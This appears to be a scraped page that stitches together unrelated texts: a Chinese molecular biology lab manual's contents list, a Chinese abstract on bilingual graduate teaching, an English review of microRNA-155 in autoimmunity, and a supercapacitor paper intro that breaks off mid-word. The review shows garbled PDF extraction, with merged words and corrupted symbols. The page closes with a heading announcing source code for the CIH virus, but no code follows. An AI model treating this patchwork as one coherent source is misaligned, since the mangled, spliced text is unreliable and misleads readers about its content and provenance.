分子生物学实验理论与操作教程分子生物学实验理论与操作教程中国农科院研究生院中国生化及分子生物学学会植物病虫害生物学国家重点实验室二零零四年七月目录前言-----------------------------------------------------------I 第一部分核酸提取----------------------------------------------1 实验一:基因组DNA提取--------------------------------------------1 实验二:总RNA提取------------------------------------------------3 第二部分亚克隆技术---------------------------------------------8 实验三:质粒DNA提取----------------------------------------------8实验四:DNA片段的酶切--------------------------------------------9 实验五:DNA片段的酶修饰-脱磷-------------------------------------12实验六:DNA片段的连接--------------------------------------------13实验七: DNA片段的回收-------------------------------------------15第三部分 PCR技术-----------------------------------------------18实验八:PCR产物的克隆技术----------------------------------------18 八.1:T-载体构建 ---------------------------------------------19八.2:PCR产物的T-载体克隆------------------------------------20八.3:PCR产物的平端克隆技术----------------------------------21实验九:RT-PCR 技术-----------------------------------------------21实验十:定量PCR -------------------------------------------------25第四部分文库构建技术------------------------------------------29实验十一:mRNA的提取及纯化 --------------------------------------29实验十二:cDNA文库构建技术- cDNA 链的反转合成--------------------32实验十三:1,cDNA文库构建技术- cDNA 链的连接、包装及转染----------34实验十三:2,RACE技术---------------------------------------------36第五部分核酸杂交技术-------------------------------------------40实验十四:DNA探针的标记------------------------------------------40实验十五:Southern杂交技术---------------------------------------44第六部分:基因及基因产物检测技术----------------------------------48实验十六:DNA的测序技术------------------------------------------48实验十七:基因表达 1,基因的体外快速翻译-------------------------532,基因的诱导表达-----------------------------54实验十八:报告基因的应用------------------------------------------57实验十九:Western杂交技术----------------------------------------58第七部分基因表达轮廓技术---------------------------------------67实验二十:DD-PCR技术---------------------------------------------73实验二一:SSH技术------------------------------------------------74第八部分:遗传转化技术-------------------------------------------75实验二二:感受态细胞制备-----------------------------------------75实验二三:重组基因的转化及筛选------------------------------------77实验二四:原生质体分离--------------------------------------------78实验二五:农杆菌转化技术------------------------------------------79第九部分:分子标记技术--------------------------------------------80实验二六:RFLP技术-----------------------------------------------86实验二七:RAPD技术-----------------------------------------------86实验二八:AFLP技术-----------------------------------------------87实验二九:SSR技术------------------------------------------------89第十部分:细胞技术-----------------------------------------------89实验三十:细胞凋亡------------------------------------------------89十一:附录一----------------------------------------------------92二-----------------------------------------------------96第一部分核酸提取目的基因主要可以通过以下途径加以分离获取。

研究生分子生物学课程双语教学探索与实践

研究生分子生物学课程双语教学探索与实践

研究生分子生物学课程双语教学探索与实践摘要:分子生物学发展迅速并在生命科学领域里应用越来越广泛,在生命科学领域中处于核心领导地位,是一门生命科学专业本科生与研究生的专业基础课或学位课。

我们本着先进性与创新性的教学理念,结合近几年对我校生命科学领域专业研究生分子生物学教学改革的经验,对英文教材选用、教学内容优化、多元化教学方法及开放式教学等课堂实践经验进行总结,并对双语教学中遇到的问题提出了若干思考和建议。

关键词:分子生物学;双语教学;课堂实践中图分类号:K826.15文献标志码:A 文章编号:1674-9324(2018)17-0164-02收稿日期:2017-09-13基金项目:2017年河北省教育厅研究生示范课程项目,高级分子生物学,KCJSX2017081作者简介:张春晓(1971-),女,河北安国人,理学博士,副教授,主要从事微生物代谢工程研究;杜朝(1969-),男,河北深泽人,理学博士,副教授,主要从事真核基因表达调控研究。

2001年8月,教育部印发了《关于加强高等学校本科教学工作提高教学质量的若干意见》(教高[2001]4号),要求各高等学校积极推动使用英语等外语进行教学[1]。

实行双语教学是我国高等教育走向世界的重要措施之一,可以使学生在专业技术方面较快掌握本学科相关的英语词汇,增强学生了解世界科技最新成果的能力,加快高校高层次教育与国际接轨的步伐[2]。

一、课程教学理念与目标分子生物学是研究核酸等生物大分子的功能、形态结构特征及其重要性和规律性的科学,是人类分子水平上真正揭开生物世界的奥秘,由被动地适应自然界转向主动地改造和重组自然界的基础学科[3]。

近年来,分子生物学发展迅速并在生命科学领域里应用越来越广泛,在生命科学领域中处于核心领导地位。

(一)先进性与创新性的教学理念我们本着先进性的教学理念,使教学内容先进,及时反映分子生物学领域的最新研究成果;教学方法、手段先进,合理运用现代信息技术等手段,改革传统的教学方法与手段。

Role of microRNA-155 in autoimmunity

Role of microRNA-155 in autoimmunity

Mini reviewRole of microRNA-155in autoimmunityRui-Xue Leng 1,Hai-Feng Pan 1,Wei-Zi Qin,Gui-Mei Chen,Dong-Qing Ye *Department of Epidemiology and Biostatistics,School of Public Health,Anhui Medical University,81Meishan Road,Hefei,Anhui,230032,PR China1.IntroductionMicroRNAs (miRNAs)have emerged as a major class of gene expression modulators linked to a wide range of biological processes such as cellular proliferation,differentiation and apoptosis [1,2].Mature miRNAs (approximately 22nucleotides in length)are endogenous,single-stranded,non-coding RNA molecules.They regulate translational repression or degradation by targeting the 30,50UTR or the coding sequences of specific mRNAs [3,4].Transcripts from genes encoding miRNAs as primary miRNAs (pri-miRNAs)are cleaved into precursor miRNAs (pre-miRNAs)in the nucleus by Drosha (an RNase III enzyme).The pre-miRNAs then are exported from the nucleus into the cytoplasm through Exportin-5.In cytoplasm,they are cleaved by Dicer along with its partner protein into approximately 19–24nucleotides miRNA duplexes [5–8].Then the functional miRNA strands are selectively loaded into the RNA-induced silencing complex (RISC).This complex directs these miRNAs to the target mRNAs [9].Recently,several miRNAs have been identified as important regulators for immune cell development,as well as immune response.For example,the expression of miR-181a in hematopoietic stem and progenitor cells led to a decrease in CD8+T cells and an increase in CD19+B cells [10].Moreover,up-regulated miR-181a expression in mature T cells augmented sensitivity to peptide antigens.In contrast,miR-181a expression inhibition in the immature T cells reduced sensitivity and impaired both negativeand positive selection [11].It has been reported that miR-146a which prevalently expressed in Treg cells,was critical for their suppressor function.The deficiency of miR-146a resulted in a failure for controlling Treg cell-mediated regulation of Th1responses [12].Collectively,these findings suggest that selectively miRNAs are crucial for immune cell function.It has been suggested that overexpression or down-regulation of miRNAs may induce dis-regulation of specific mRNAs.Moreover,mutations in the 30UTR of mRNAs could influence the binding ability of the miRNAs or generate new miRNA binding sites [13].All these factors may affect human immune system and then result in many pathogenic disorders.Indeed,it has been reported that many miRNAs are involved in the pathogenesis of autoimmune diseases [6,13].To date,miR-155is one of the most highly implicated miRNAs in autoimmunity.Available data demonstrated that miR-155has powerful regulatory functions in a wide variety of immune cells such as T cells,B cells and dendritic cells (DCs)[14–16].Moreover,aberrant expression of miR-155has been observed in many autoimmune conditions [17–19].In this review,we will focus on the pro-inflammatory potential of miR-155and discuss the current understandings for the role of miR-155in autoimmune diseases.Hopefully the information obtained will benefit for developing novel therapeutic strategies.2.MicroRNA-155MiR-155is encoded within a region known as B cell integration cluster (Bic )gene,identified originally as a frequent integration site for the avian leukosis virus [20,21].Human Bic gene consists of three exons within a 13kb region located in chromosome 21q21.Highest levels of Bic expression have been detected in several human tissues such as spleen and thymus.When compared with Bic cDNAs from human,chicken and mouse reveals 78%identity over 138Cytokine &Growth Factor Reviews 22(2011)141–147A R T I C L E I N F OArticle history:Available online 23June 2011Keywords:MicroRNA-155Immune cellsAutoimmune diseasesA B S T R A C TMicroRNAs (miRNAs)have recently emerged as a major class of gene expression regulators linked to most biological functions.MiR-155is encoded within a region known as B cell integration cluster (Bic )gene,identified originally as a frequent integration site for the avian leukosis virus.Disregulation of endogenous miR-155has been implicated in the pathogenesis of human cancers.Recently,aberrant expression of miR-155was observed in many autoimmune conditions,including rheumatoid arthritis (RA),multiple sclerosis (MS),and systemic lupus erythematosus (SLE).Moreover,functional analysis demonstrated that miR-155has powerful regulatory potential in a wide variety of immune cells through targeting specific mRNAs.Since pathogenic immune cells play a pivotal role in pathogenesis of human autoimmune diseases,miR-155might be a versatile therapeutic target.This review will discuss the current understandings for the role of miR-155in autoimmunity.ß2011Elsevier Ltd.All rights reserved.*Corresponding author.Tel.:+865515167726;fax:+865515161171.E-mail address:ydq@ (D.-Q.Ye).1These authors contributed equally to this work and should be considered co-first authors.Contents lists available at ScienceDirectCytokine &Growth Factor Reviewsj o ur n a l ho m e p a g e :w w w .e l s e v i e r .c om /l oc a t e /c y t o g f r1359-6101/$–see front matter ß2011Elsevier Ltd.All rights reserved.doi:10.1016/j.cytogfr.2011.05.002nucleotides[22].Currently,overexpression or down-regulation of expression of miR-155has been implicated in the pathogenesis of cancers.For example,high expression of Bic and miR-155has been shown in diffuse large B cell lymphoma,Hodgkin’s lymphoma [23,24].Consistently,E m-mmu-miR155transgenic mice exhibited initially a preleukemic pre-B cell proliferation especially in spleen and bone marrow,and then develop a frank B cell malignancy[25].In contrast,lack of Bic and miR-155expression has been demonstrated in adult Burkitt lymphoma[26].3.MiR-155function in immune cellsT cells,B cells and DCs in patients with autoimmune diseases display altered attributes and play a central role in disease progression and pathology.Pathogenic auto-antibodies and cyto-kines secreted by these immune cells participate in the amplification and perpetuation of inflammatory and autoimmune response.In this review,we present the recent advances of miR-155role in immune cells.Especially,we highlight its regulation mechanism and the consequences of disregulation for immune cell responses.These findings may be critical for understanding the nature of the miRNA in the pathogenesis of various autoimmune diseases.3.1.The role of miR-155in B cellsPre-B cell lymphoma in mice caused by transgenic expression of miR-155in B cell suggests that the miRNA may have an important role in B cell function[25].Rodriguez et al.and Thai et al. simultaneously showed that Bic/miR-155deficient mice exhibited defective B immunity,including reduced numbers of germinal center(GC)B cells[27,28].Vigorito et al.investigated the cellular basis of the defects,and found that miR-155-deficient B cells resulted in reduced extrafollicular and germinal center responses. Moreover,these B cells failed to produce high-affinity IgG1 antibodies.By a genome-wide analysis of gene expression in miR-155-deficient B cells,they found that a total of185protein coding genes were significantly influenced.Particularly,PU.1(an Ets-family transcriptional regulator)was identified as a functionally target of miR-155in B cells.Vigorito et al.showed that miR-155 can directly target PU.1mRNA via a predicted miR-155-binding site in the30untranslated region.Moreover,they detected elevated PU.1expression in miR-155-deficient B cells.In addition,forced expression of PU.1in wild-type primary B cells led to a reduction in the proportion of IgG1-expressing cells[29].Dysfunction of the machinery for class switch recombination (CSR)and somatic hypermutation(SHM)can result in reduced amounts of switched antibodies and impaired production of high-affinity antibodies.However,Vigorito et al.showed that there was a normal rate of CSR and SHM in miR-155-deficient B cells. Interestingly,the mRNA expression of activation-induced cytidine deaminase(AID,a potent DNA mutator which plays a crucial role for CSR and SHM),was modestly increased in the absence of miR-155[29].Recently,Teng et al.identified that miR-155was a negative regulator of AID by targeting a conserved site in the AID 30untranslated region.Disruption of this target site in vivo resulted in quantitative and temporal deregulation of AID expression, higher levels of CSR and impaired affinity maturation.They believed that the effect for loss of miR-155regulation of AID likely reflect the composite deregulation of at least60genes reported by Vigorito et al.However,the phenotypes of AID-GFP-Mut mice used by Teng et al.seem to be different with those reported by Vigorito et al.Teng et al.concluded that the effects of their mice model may not be apparent in the more complex context of total miR-155 deficiency[29,30].It has been reported that inositol phosphatase SHIP1deficiency in B lymphocytes resulted in spontaneous germinal center formation and antibody class-switching[31–33].Recently,O’Connell et al. showed that SHIP1is a direct target of miR-155in hematopoietic system[34].Moreover,Pedersen et al.identified the SHIP1as a bonafide target of miR-155in diffuse large B cell lymphoma[35]. Collectively,these data suggest that miR-155-SHIP1axis may also play an important role for regulating B-cell activation and survival.3.2.MiR-155and Th cells disregulationRodriguez et al.assessed whether there was an intrinsic requirement for miR-155in Th cell function.They demonstrated that Bic-deficient CD4+T cells were intrinsically biased towards Th2 differentiation in view of higher numbers of IL-4-producing cells and enhanced levels of the Th2cytokines.To understand how Bic/miR-155regulates Th2commitment.Rodriguez et al.identified that the transcription factor c-Maf(a potent transactivator of the IL-4 promoter),which contains phylogenetically conserved miR-155 seed matches in the30UTR,was a direct target of miR-155. Consistently,a significant induction of c-Maf mRNA and protein was detected in Bic m2/m2Th2cells.However,the data suggested that Bic/miR-155was not required for Th1differentiation although Th1 cells exhibited altered phenotype[27].Thesefindings were confirmed by Blu¨ml et al.They investigated cytokines prototypic for Th1and Th2polarization,and found that there was a trend towards increased IL-4levels but no significant difference in IFN-g production in miR-155deficient mice[36].Interestingly,Banerjee et al.showed that overexpression of miR-155in activated CD4+T cells promoted Th1differentiation,although lacking miR-155also led to a bias towards Th2differentiation in CD4+T cells.Consistently, the frequency of IFN-g+cells was significantly increased.Moreover, they identified IFN-g R a as an additional target of miR-155in Th1 cells that could account for enhanced Th1differentiation[37]. Similar to the regulation of Th1/Th2differentiation reported by Banerjee et al.,inefficient Th2skewing was observed in mice with T cell-specific deletion of SHIP.In contrast,there was an increased basal level of the Th1-associated transcriptional factor T-bet[37,38]. The reasons for these discrepancies are still not clear,further studies are needed to explore the phenomenon.Current data also showed miR-155deficient mice have substantially diminished amounts of Th17cells.In addition, defective productions of IL-17A also were observed[15].Moreover, Blu¨ml et al.found that Th17polarization of miR155À/ÀT cells showed reduced production of the Th17cytokines IL-17and IL-22 [36].These data suggest that miR-155also have an intrinsic requirement for Th17cell development.E26transformation-specific-1(Ets-1),an Ets family of transcription factor,is broadly linked to the disregulation of immune system[39,40].It has been reported that miR-326can promote Th17differentiation by targeting Ets-1,a negative regulator of Th17differentiation. Additionally,miR-326in CD4+T cells regulated the amount of endogenous Ets-1protein but did not affect Ets-1transcripts[41]. Recently,Zhu et al.demonstrated that miR-155were able to target Ets-1in human umbilical vein endothelial cells(HUVECs)[42]. These data provide a possibility that Ets-1may be a target of miR-155in CD4+T cells.Th9cell has been involved in pathogenesis of autoimmune diseases especially in multiple sclerosis[43].Since the transcription factor PU.1is required for the development of IL-9-producing T cells[44].MiR-155may also have capability to regulate Th9cell function by targeting PU.1.However,further studies are required to test these hypotheses.3.3.MiR-155in Treg cellsFoxp3+regulatory T(Treg)cells are crucial to maintain immunological tolerance by limiting pathogenic Th cell responses. Current data showed that miR-155can contribute to theR.-X.Leng et al./Cytokine&Growth Factor Reviews22(2011)141–147 142development of Treg cells.MiR-155deficient mice have reduced numbers of Treg cells in the thymus and periphery[45].Moreover, elevated miR-155expression was required for maintaining Treg cell proliferative potential[46].IL-2has long been known for its crucial role in Treg cell homeostasis[47].Lu et al.showed that miR-155-deficient Treg cells exhibited attenuated IL-2signaling. Interestingly,they found that the diminished Treg cell proliferative activity was due to impaired signaling in response to limiting amounts of IL-2.Moreover,they also identified SOCS1(a negative regulator of IL-2signaling pathway)as a direct target of miR-155. Consistently,inhibition of SOCS1expression level controlled by miR-155maintained Treg cell homeostasis[46].It has been indicated that continuous Foxp3expression was indispensable for maintaining high amounts of miR-155in Treg cells[45,46]. However,available data suggest that miR-155expression was not necessarily regulated by Foxp3.Stahl et al.showed that Foxp3 bound the genomic Bic/miR-155locus in human regulatory T cells. Surprisingly,they did not found the binding in CD4+Th cells,which also express Foxp3after activation.Thefinding also was confirmed by the following evidence:CD4+Th cells from Scurfy mice(the mice lack the functional Foxp3protein)have the same level of induction of miR-155upon activation as wild type CD4+Th cells [48].When compared to WT Treg cells,miR-155deficient Treg cells are not functionally defective on a per cell basis,suggesting that miR-155was not required for suppressor activity of Treg cells [15,45,46].Divekar et al.showed that CD62L may be a target of miR-155by using computational approaches.Moreover,forced expression of miR-155resulted in reduced CD62L level.These data suggest a role for miR-155in controlling CD62L expression. Interestingly,they reported that reduced CD62L is correlated with reduced suppressive capacity of MRL Treg cells.However,they did not provide direct data for proving the association[49].Although these data demonstrated that Treg cells did not alter their suppressive capacity in absence of miR-155[15,45,46].MiR-155 inhibitor-treated CD4+Th cells exhibited a much higher suscepti-bility to nTreg-mediated suppression than control-transfected responder CD4+Th cells.Consistent with thefindings,over-expression of miR-155in CD4+Th cells resulted in a strongly decreased susceptibility to nTreg cell-mediated suppression[48].3.4.Profound impact of miR-155on DC immune responsesRecently,the most studied miRNA in dendritic cells(DCs)is miR-155.Available data has demonstrated that miR-155has a profound impact on DC immune responses.Ceppi et al.showed that miR-155can negatively modulate the IL-1signaling pathway in activated human monocyte-derived DCs(moDCs).In miR-155 silenced LPS-activated moDCs,the expression of IL-1a,IL-1b and other pro-inflammatory cytokines were up-regulated.Moreover, they identified that TAB2is a newly direct miR-155target in activated moDCs,which probably exerts a negative feedback control on the IL-1signaling pathway[50].Zhou et al.reported that miR-155and its star-form partner miR-155*cooperatively regulate type I interferon production by human plasmacytoid DCs(PDCs).However,in the progression of regulation,miR-155* and miR-155exhibited opposite effects.MiR-155*augmented interferon a(IFN a)and IFN b expression by targeting IRAKM.In contrast,miR-155inhibited their production by suppressing TAB2 in human PDCs[16].These results suggest that miR-155may play an essential role in controlling the intensity of the inflammatory response in human DCs.The regulatory potential of miR-155in DCs was also showed by Lu et al.They showed that overexpression of miR-155can induce human DC apoptosis.Moreover,mature DCs from miR-155deficient mice were less apoptotic than those from wild type mice.They also concluded that p27kip1accumulation may contribute to the induction of apoptosis by a mechanism that miR-155directly targeted kip1ubiquitination-promoting complex 1(KPC1)[51].Despite these anti-inflammatory function,miR-155 also induced pathogenic DC cell responses through promoting DC specific cytokines.Lu et al.indicated that forced expression of miR-155in mature DCs led to higher levels of IL-12p70secretion through targeting SOCS-1.Moreover,they suggest that over-expression of miR-155also could enhance the ability of mature DCs to activate NK cell production of IFN-g[51].Furthermore,in miR-155deficient GM-CSF-derived DCs,expression of several pro-inflammatory cytokine genes including IL-12,IL-6,IL-23p19and IL-23p40(which are crucial for Th1and Th17cell development) were significantly decreased.In addition,forced expression of miR-155in GM-CSF-derived DCs also increased TNF-a production[15].4.MiR-155and autoimmunity4.1.MiR-155pathogenic potential by controlling immune cell responsesAs mentioned above,miR-155has powerful regulatory func-tions in immune cells by targeting several specific mRNAs(Fig.1). The data also suggest that immune cell pathogenic effect can be promoted by increased level of miR-155.Indeed,miR-155-deficient B cells exhibited reduced extrafollicular and germinal center responses.Memory response was also impaired in the absence of miR-155.Moreover,miR-155deficiency led to reduced IgG1production[29].Since B cells carry out essential roles in the pathogenesis of autoimmune diseases especially in systemic lupus erythematosus(SLE)and rheumatoid arthritis(RA).Over-expres-sion of miR-155might promote the generation and/or amplifica-tion of pro-inflammatory responses in target organs of these diseases.IFN-g-producing Th1and IL-17-producing Th17cells have been associated with the pathogenesis of many organ-specific autoimmune diseases.Interestingly,miR-155has not an intrinsic requirement for IFN-g-production of Th1cells[27,36].Production of IFN-g-cytokine initiated by miR-155may depend on two additional mechanisms:First,miR-155promoted IL-12secretion of DCs[15,51];secondly,over-expression of miR-155in mature DCs enhanced IFN-g production by NK cells[51].In contrast, current data showed that miR-155have an intrinsic requirement for secretion of the Th17cytokines such as IL-17and IL-22[36]. Moreover,the level of Th17cell-related inflammatory cytokines can be further enhanced through DC expression of specific cytokines(IL-6,IL-23)promoting by miR-155[15].Treg cells play a critical role in preventing autoimmunity,and their failure contributes to development of autoimmune diseases. MiR-155deficiency resulted in reduced numbers of Treg cells while elevated miR-155expression maintained Treg cell prolifer-ative potential[45,46].These data suggest that over-expression of miR-155may limit pathogenic immune cell responses by promoting Treg cell regulatory capacity.However,as mentioned above,increased expression of miR-155did not alter suppressor activity of Treg cells[15,45,46].Additionally,its over-expression in human CD4+Th cells led to a strongly decreased susceptibility of these Th cells to nTreg cell-mediated suppression[48].Collective-ly,miR-155in immune cells demonstrates a pathogenic potential and its elevated-expression may evoke autoimmune responses.4.2.Expression of miR-155in human autoimmune diseasesMiR-155exhibited pathogenic potential by controlling immune cell responses.Thus,disregulated expression of miR-155in these cells may result in autoimmune diseases.It has been demonstrated that there was a much higher miR-155expression levels in RA synovial tissue,fluid andfibroblasts than in those from patientsR.-X.Leng et al./Cytokine&Growth Factor Reviews22(2011)141–147143with osteoarthritis (OA)[17,52].Moreover,Stanczyk et al.reported a 4.4-fold increase in miR-155expression in RA synovial fluid CD14+cells compared with RA peripheral blood CD14+cells.However,they found no significant difference in miR-155expression in peripheral blood CD14+cells between RA patients and healthy controls [17].In contrast,Pauley et al.showed that expression of miR-155in peripheral blood mononuclear cells (PBMCs)was 1.8-fold higher for RA patients than for healthy control individuals.It is possible that differences in experimental techniques or patient populations contribute to this discrepancy [53].Recently,Niimoto et al.also reported that expression of miR-155in PBMCs from RA patient were significantly higher than in OA patients and healthy subjects.In addition,they also identified that miR-155production were significantly up-regulated during the differentiation of the IL-17producing T cells in microarray analysis.Moreover,quantitative PCR analysis confirmed the result and showed a 9-fold increase in miR-155level in expanded IL-17producing T cells compared with non-expanded cells [54].More recently,Dai et al.showed that miR-155were significantly increased in whole splenocytes,as well as in splenic B and T cells from MRL-lpr mice (a murine lupus model)when compared to MRL mice.Moreover,the up-regulated miR-155was also observed in splenocytes from B6-lpr mice (a murine lupus model)[55].Furthermore,Divekar et al.found that purified MRL-lpr Treg cells exhibited a significant overexpression of miR-155[49].However,the level of miR-155expression in purified human B cells and T cells has not been determined.Recently,Wang et al.examined the serum and urine supernatant level of miR-155in patients with SLE.Interestingly,they found that compared to controls,patients with SLE had significantly lower serum levels of miR-155(17.36Æ1.08vs 20.58Æ1.90;p <0.001).Compared to urinary supernatant,serum had a higher level of miR-155(11.23Æ3.96vs 18.24Æ1.97;p <0.001),while the urine superna-tant level of miR-155was similar in patients and controls.However,the decreased serum levels of miR-155may attribute to effect of immunosuppressive drugs.Indeed,all the 40patients required maintenance immunosuppressive therapy.Moreover,they found that serum miR-155level was negatively correlated with the dosage of prednisolone (r =À0.387,p =0.014)[18].Thus,future studies are required to assess the level of miR-155in untreated SLE patients.Except for aberrant expression of miR-155in RA and SLE,elevated expression of miR-155has been observed in brain lesions frommultiple sclerosis (MS)patients [19].Moreover,miR-155level also were significantly increased in the inflamed colonic mucosa of patients with active ulcerative colitis (UC)compared with the healthy volunteers [56].4.3.MiR-155in the development of autoimmunitytanczyk et al.demonstrated that miR-155expression can repress the induction of matrix metalloproteinases (MMPs)1and 3in RA synovial fibroblasts.Thus,they hypothesized that miR-155might has a counter-regulatory role in the process of tissue destruction in RA joints [17].However,the net effect of miR-155in RA has not beendetermined.Recently,Blu¨ml et al.investigated the role of the miRNA in the pathogenesis of autoimmune arthritis using miR155À/Àmice.They showed that miR155À/Àmice did not develop collagen induced arthritis (CIA).MiR-155deficiency prevented the genera-tion of pathogenic IgG antibodies.Moreover,autoreactive T cells were reduced in miR155À/Àmice compared to wild type mice.After induction of CIA,miR155À/Àanimals showed decreased systemic levels of IL-6and IL-17.Furthermore,miR-155deficiency impaired local bone destruction through reducing osteoclast differentiation [36].The effects of miR-155in CIA were similar to these in experimental autoimmune encephalomyelitis (EAE),miR-155À/Àmice were highly resistant to EAE.MiR-155À/Àmice exhibit defective pathogenic T cell (including Th17cell and Th1cell subsets)function during EAE.Furthermore,miR-155deficiency impaired dendritic cell specific cytokines that required for inflammatory T cell development [15].As mentioned above,DC cell responses triggered by miR-155exhibit heterogeneous phenotypes [15,16,50,51].However,miR155À/Àmice did not develop autoimmunity despite of DC cell anti-inflammatory function.Wang et al.showed that serum miR-155level in patients with SLE was positively correlated with glomerular filtration rate (GFR)(r =0.384,p =0.014)and high-sensitivity C-reactive protein (hsCRP)(r =0.412,p =0.008).Unexpectedly,the level was not significantly correlated with proteinuria and SLE Disease Activity Index (SLEDAI).In the study,however,several potential factors such as small sample size,limited duration of follow up and sustained immunosuppressive therapy may result in false association [18].Indeed,in lupus mice model,available data strongly indicated that the overexpression of miR-155in splenic lymphocytes was correlated with lupus strains anddiseaseFig.1.Role of miR-155in immune cell function.R.-X.Leng et al./Cytokine &Growth Factor Reviews 22(2011)141–147144development[55].Future study by using miR-155deficient mice should be conducted to explore its direct role in lupus.Collectively, disregulated expression of miR-155in immune cells can contribute to development of autoimmunity(Table1).5.Regulation of miR-155expressionAberrant expression of miR-155in human immune cells may result in cancers or autoimmune diseases.Therefore,miR-155may be an effective therapeutic target in the treatment of a range of immune disorders.However,delivery of miRNA inhibitors to specific cell types in vivo remains a big challenge[15].Advanced insight of regulation mechanism of miR-155expression may benefit for therapeutic strategies for autoimmunity.It has been reported that miR-155was induced by a number of immune cell stimuli including TNF-a,IFN-b and Toll-like receptor(TLR)ligands [57].O’Connell et al.investigated the regulated mechanisms of miR-155by TLR and interferon signaling in primary murine macrophages,they found that several TLR ligands up-regulated miR-155expression by either the MyD88or TRIF signaling, whereas IFNs required TNF-a autocrine signaling to increase miR-155level.Moreover,they indicated that JNK pathway was involved in the regulation of miR-155in view of JNK inhibition blocked both poly(I:C)and TNF-a induction of miR-155[57].Similar to induction of miR-155in normal immune cells,Stanczyk et al.found that TNF-a,IL-1-b and TLR ligands including LPS,poly(I–C),and bacterial lipoprotein markedly induced miR-155expression in RA synovialfibroblasts.Additionally,induced production of miR-155showed a highest increasing with TNF-a stimulation(about5.7-fold)[17].Yin et al.analyzed signaling pathways involved in activating miR-155following B-cell receptor(BCR)engagement.BCR activation induced Bic/miR-155expression in human Burkitt lymphoma cell line(Ramos)through a conserved AP-1element. Moreover,the progression for induction of miR-155transcription required the ERK and JNK signaling pathways but not the p38 pathway[58].However,whether BCR engagement can induce expression of miR-155in human autoimmune B cells is still unclear.Except for signaling pathways involved in miR-155induction, current data suggest that recombinant IL-10can inhibit miR-155 expression in primary bone marrow-derived macrophages and human PBMCs.IL-10inhibited miR-155transcription in a STAT3-dependent manner.Moreover,the Ets-1binding site found within the Bic promoter was required for the IL-10-mediated suppression of the Bic gene.However,NF-kB and AP1sites seem not to be required in view of the fact that the IL-10was able to suppress Bic promoter luciferase expression when these sites were mutated. Consistent with the effect for IL-10-mediated suppression of miR-155,SHIP1expression was increased[59].Intriguingly,in human autoimmune diseases such as SLE,circulating IL-10levels were about9-fold higher in active SLE patients compared with controls, and correlated with SLEDAI score[60].Since available data have showed that IL-10polymorphisms are associated with SLE[61]. The genetic deficiency may influence IL-10function in autoim-mune conditions.Recently,Pedersen et al.showed that elevated levels of miR-155 in diffuse large B cell lymphoma were the result of autocrine stimulation by TNF a.Eternacept and infliximab(anti-TNF a regimen)were sufficient to reduce miR-155levels in diffuse large B cell lymphoma.Furthermore,they observed a substantial decrease in tumour burden in diffuse large B cell lymphoma xenografts in response to anti-TNF a therapy[35].The data suggest that therapeutic agents such as antibody for pro-inflammatory and TLRs may be effect for controlling the level of miR-155in human autoimmune diseases.Indeed,current data have demonstrated that there were a much higher miR-155expression levels in RA [17,52].Moreover,miR155À/Àmice did not develop CIA[36]. Since TNF a proved to be the most potent stimulus of miR-155 expression in RA synovialfibroblasts[17].Anti-TNF a therapy should be an effect option for treat miR-155-derived autoimmu-nity.Collectively,these data highlights the value of exploring key pathways involved in regulation of miR-155expression.6.ConclusionRecent studies have demonstrated that miR-155plays a crucial role in the function of pathogenic immune cells, including B cells,DCs and Th17cells.Moreover,aberrant expression of miR-155is observed in many human autoimmune conditions.Furthermore,miR-155deficient mice impaired autoimmune development.All these suggest the miRNA may be an effective therapeutic target for autoimmune diseases. Since overexpression or down-regulation of expression of miR-155is associated with increased risk of cancer,an appropriate level of miR-155expression may be important for maintaining normal immune responses.Nevertheless,future investigations are still required to comprehensively uncover the therapeutic potential of miR-155in autoimmunity.Competing interestsThe authors declared no competing interests. AcknowledgementsThis work was supported by grants from the key program of National Natural Science Foundation of China(30830089)and the Anhui Provincial Natural Science Foundation(11040606M183). References[1]Miska EA.How microRNAs control cell division,differentiation and death.CurrOpin Genet Dev2005;15:563–8.[2]Park SM,Peter ME.MicroRNAs and death receptors.Cytokine Growth FactorRev2008;19:303–11.[3]Filipowicz W,Bhattacharyya SN,Sonenberg N.Mechanisms of post-transcrip-tional regulation by microRNAs:are the answers in sight?Nat Rev Genet 2008;9:102–14.[4]Miranda KC,Huynh T,Tay Y,Ang YS,Tam WL,Thomson AM,et al.A pattern-based method for the identification of MicroRNA binding sites and their corresponding heteroduplexes.Cell2006;126:1203–17.Table1The role of miR-155in autoimmune diseases.Autoimmune diseases Increased expression in cells or tissue Autoimmune development in animal models Refs.Rheumatoid arthritis Synovial tissue,fluid,fibroblasts;PBMCs a MiR155À/Àmice did not develop CIA[17,36,52–54] Multiple sclerosis Brain lesions a MiR155À/Àmice were highly resistant to EAE[15,19] Ulcerative colitis Inflamed colonic mucosa a Unknown[56]Systemic lupus erythematosus Splenic B and T cells;Treg cells b MiR-155level positively correlated lupus disease development[49,55]a Human.b Animal model.R.-X.Leng et al./Cytokine&Growth Factor Reviews22(2011)141–147145。

a novel precursor for heavily nitrogen doped supercapacitor carbon

a novel precursor for heavily nitrogen doped supercapacitor carbon

Introduction
Supercapacitors have been a prime research focus for high power-density energy storage applications for the past two decades. The heightened interest and activity in supercapacitor research as compared to that of conventional batteries is not only due to their high power capability (10 kW kgÀ1 vs. 0.1 kW kgÀ1), but also good reversibility, and long cycle life.1–3 With supercapacitors, a signicant energy uptake and delivery is achieved within seconds.4 However, they inherit the limitation of a lower energy density of around 5 W h kgÀ1, which makes them unsuitable for applications where long term energy delivery is sought.5 Supercapacitors come in two variants differing in the mechanism of energy storage. One is the EDLC-type, where energy is stored by the adsorption of ions at the outer Helmholtz plane on the electrode–electrolyte interface (electric double layer). In this context, the synthesis of high surface area porous carbon materials with good electrical properties is of importance.6 Graphene-like materials and graphene hydrogels have also shown considerable promise for high performance supercapacitor applications in view of their high conductivity and surface catalytic properties.7–13 The other variant is the pseudoa

CIH源码及中文注释

CIH源码及中文注释

